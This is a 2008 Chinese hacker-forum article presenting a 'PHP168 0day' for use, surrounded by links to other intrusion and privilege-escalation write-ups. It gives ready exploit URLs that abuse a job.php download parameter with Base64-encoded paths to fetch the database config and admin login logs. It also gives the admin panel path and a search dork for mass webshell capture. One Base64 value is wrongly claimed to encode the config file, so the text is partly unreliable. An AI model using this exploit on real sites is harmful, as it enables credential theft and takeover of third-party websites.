·	没有路由密码权限时的鸽	08-23	·	PHP168整站系统0DAY	10-31
·	ASPXshell MS08-067插件	10-31	·	SA执行命令方法总结	10-31
·	神奇XT 让Windows图片查	10-31	·	Vista系统EFS加密功能的	10-31
·	Windows 2008下应对驱动	10-30	·	用U盘共享Windows vista	10-29
·	占用0%资源 HOST文件打造	10-29	·	延长硬盘寿命！深入了解	10-29
·	响应MS08-067 Windows系	10-29	·	一种防注入代码的绕过学	10-28
·	Ms08-067 Exp 详细测试流	10-28	·	织梦(Dedecms)任意代码执	10-28
·	社工+提权艰难入侵某通信	10-28	·	艰难入侵源码站并提权	10-28
·	MSN,QQ,网页总掉线该怎么	10-27	·	入侵的10个小技巧	10-27
·	渗透(香港)劲舞团官方论	10-27	·	教你巧用文本编辑器查找	10-27
·	上传漏洞之构造入侵	10-27	·	某信息港的渗透入侵过程	10-27
·	入侵Phpcms网站管理系统	10-27	·	入侵狐狸黑客学习网详细	10-25
·	Olympe Network提供100M	10-25	·	告别Windows白屏让窗口	10-24
·	对症下药，让IIS“植入”	10-24	·	设计资源吧提供5GB免费p	10-24

[推荐]PHP168整站系统0DAY

荐 ★★★★

PHP168整站系统0DAY

文章整理发布：黑客风云文章来源：www.05112.com 更新时间：2008-10-31 11:39:08

首先说明下是这个洞是在其他地方看到的，只是他没有说的很清楚，好多菜菜都不明白，我就拿这发我的第一个贴吧！
这个洞其实就是利用了程序的编码漏洞，下载配置和登陆日志文件，一下是利用方法。

下载 mysql_config.php 和 adminlogin_logs.php 两个文件到本地。

http://dabei.org//job.php?job=download&url="aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA=="

http://dabei.org//job.php?job=download&url="aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA=="

程序后台：http://dabei.org/admin/index.php?iframe=1

Base64加密代码：

http://dabei.org//cache/adminlogin_logs.php == "aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA==" (引号里面的是Base64加密后的)

http://dabei.org//php168/mysql_config.php == "aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA==" (引号里面的是Base64加密后的)

批量抓webshell：
google,baidu 输入关键字：Powered by PHP168

文章录入：cainiaowang 责任编辑：xinlian

上一篇文章：社工+提权艰难入侵某通信局

下一篇文章：没有了

【字体：小大】

实例讲解跨站入侵攻防战之攻击篇	05-08
对偶偶娱乐分站服务器的安全检测	04-23
入侵88red系统的详细过程	04-07
对趋势科技等数万网站被攻击的分	03-21
凡人网络购物系统 V8.0 简体中文	03-18
linux平台下渗透日本著名XXXXXX.	03-18
搜索框所引起的XSS漏洞	03-05
跳转漏洞的利用	03-05
对复旦大学的一次漫长渗透	03-03
.net一句话马以及dx论坛拿shell	03-01
php渗透入侵过程图文详解	03-01
DJ网站的入侵详细过程	02-26